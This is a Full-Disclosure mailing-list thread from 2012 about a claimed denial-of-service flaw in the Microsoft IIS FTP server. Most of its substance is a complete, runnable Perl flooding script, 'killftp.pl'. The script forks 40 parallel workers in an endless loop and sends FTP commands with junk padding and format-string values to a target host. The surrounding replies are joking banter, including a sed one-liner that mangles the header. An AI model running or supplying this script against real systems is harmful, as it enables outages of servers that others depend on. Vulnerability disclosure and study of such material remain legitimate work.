MusntLive is find your problem: echo "
> > # Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of > Service (CPU exhaustion) > # Date: June 29, 2012 > # Author: coolkaveh > # [email protected] > # https://twitter.com/coolkaveh > # Vendor Homepage: http://www.microsoft.com > # Version: Microsoft IIS 6 , 7.5 FTP Server > # Tested on: windows server 2008 r2 , seven , > #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > #When sending multiple parallel FTP command requests to a Microsoft > IIS FTP Server > #CPU usage goes up to max capacity and server gets non responsive. > test it with two core > #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > # Lame Microsoft IIS FTP Server Remote Denial Of Service > #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ " | sed 's:coo:xXxcoo:g;s:veh:vehxXx:g;s:> ::g;s:e:3:g;s:a:@:g;s:i:\!:g;s:u:\\\/:g;s:o:\(\):g' Is code of yours is not hacker code. MusntLive patch is your code above. Re-test. Tested under BeOS is confirmed On Mon, Jul 16, 2012 at 3:18 PM, kaveh ghaemmaghami <[email protected]> wrote: > Hi OK i will plus they didn't fix > http://seclists.org/fulldisclosure/2012/Jul/27 > > > # Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of > Service (CPU exhaustion) > # Date: June 29, 2012 > # Author: coolkaveh > # [email protected] > # https://twitter.com/coolkaveh > # Vendor Homepage: http://www.microsoft.com > # Version: Microsoft IIS 6 , 7.5 FTP Server > # Tested on: windows server 2008 r2 , seven , > #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > #When sending multiple parallel FTP command requests to a Microsoft > IIS FTP Server > #CPU usage goes up to max capacity and server gets non responsive. > test it with two core > #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > # Lame Microsoft IIS FTP Server Remote Denial Of Service > #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > #!/usr/bin/perl -w > use IO::Socket; > use Parallel::ForkManager; > $|=1; > sub usage { > print "Please DISABLE firewall daemon of this operating system first!\n"; > print "FTP Server Remote Denial Of Service\n"; > print "by coolkaveh\n"; > print "usage: perl killftp.pl <host> \n"; > print "example: perl killftp.pl www.example.com \n"; > } > $host=shift; > $port=shift || "21"; > if(!defined($host)){ > print "Please DISABLE firewall daemon of this operating system > first!\n"; > print "FTP Server Remote Denial Of Service\n"; > print "by coolkaveh\n"; > print "[email protected]\n"; > print "usage: perl killftp.pl <host> \n"; > print "example: perl killftp.pl www.example.com \n"; > exit(0); > } > $check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60); > if(defined $check_first){ > print "$host -> $port is alive.\n"; > $check_first->close; > } > else{ > die("$host -> $port is closed!\n"); > } > @junk=('A'x5,'A'x17,'A'x33,'A'x65,'A'x76,'A'x129,'A'x257,'A'x513,'A'x1024, > '%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s', > '%08x','%%20d','%%20n','%%20x','%%20s','%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p', > '%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%','%s'x129,'%x'x257,'-1','0','0x100', > '0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000','0x100000','1', > ); > @command=( > 'NLST','CWD','STOR','RETR', > 'MKD','RMD','DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE', > 'APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE > L','TYPE I','NLST','CWD', 'STOR','RETR','MKD', > 'RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT', > 'HELP','MODE','APPE','STRU','SITE','SITE INDEX', > 'TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', > 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM', > 'SIZE','STAT','ACCT', 'HELP','MODE','APPE','STRU','SITE','SITE > INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I', > 'NLST','CWD','STOR','RETR','MKD','RMD', > 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE', > 'STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE > I','NLST','CWD','STOR','RETR','MKD','RMD','DELE', > 'RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE > INDEX','TYPE','TYPE A','TYPE E', > 'TYPE L','TYPE I','NLST','CWD','STOR','RETR','MKD','RMD', > 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP', > 'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A', > ); > print "Dosing Server!\n"; > $pm = new Parallel::ForkManager(40); > while (1) { > my $pid = $pm->start and next; > COMMAND_LIST: foreach $cmd (@command){ > foreach $poc (@junk){ > LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host, > PeerPort=>$port, Proto=>'tcp', Timeout=>30); > if(defined($sock4)){ > $sock4->send("$cmd"." "."$poc\r\n", 0); > $sock4->recv($content, 100, 0); > } > } > } > $pm->finish; > } > > > On Mon, Jul 16, 2012 at 11:54 AM, Григорий Братислава > <[email protected]> wrote: >> On Mon, Jul 16, 2012 at 2:50 PM, kaveh ghaemmaghami >> <[email protected]> wrote: >>> Hello list >>> in my testing environment (IIS 6 with php5 ) the flaw exist ..... i >>> think i got da move to XAMPP MS wont patch it LOL >>> >> >> >> Test environment is not production environment. Is place your test >> server in your production network and is send me information for to >> test. -- `Wherever I is go - there am I routed` _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
